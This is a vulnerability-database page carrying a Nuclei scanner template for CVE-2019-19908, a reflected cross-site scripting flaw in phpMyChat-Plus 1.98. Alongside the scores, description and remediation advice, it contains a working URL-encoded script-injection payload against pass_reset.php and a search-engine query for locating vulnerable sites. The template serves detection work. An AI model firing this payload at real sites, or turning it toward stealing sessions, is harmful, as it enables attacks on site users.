Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-19908
HistoryApr 08, 2020 - 1:04 p.m.

phpMyChat-Plus 1.98 - Cross-Site Scripting

2020-04-0813:04:46
ProjectDiscovery
github.com
4

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.005

Percentile

77.5%

phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
id: CVE-2019-19908

info:
  name: phpMyChat-Plus 1.98 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: |
    phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of phpMyChat-Plus or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://cinzinga.github.io/CVE-2019-19908/
    - http://ciprianmp.com/
    - https://sourceforge.net/projects/phpmychat/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-19908
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-19908
    cwe-id: CWE-79
    epss-score: 0.00673
    epss-percentile: 0.79388
    cpe: cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ciprianmp
    product: phpmychat-plus
    google-query: inurl:"/plus/pass_reset.php"
  tags: cve2019,cve,phpMyChat,xss,ciprianmp

http:
  - method: GET
    path:
      - "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'username = "</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e51abfca180f205dc79bac6724631e455a180f4ff3f7a510c350f62e08c65cbf02204058fd79592d234d41c7d815fec39aa41338b6bc87b122d5d549ba85321d61f2:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.005

Percentile

77.5%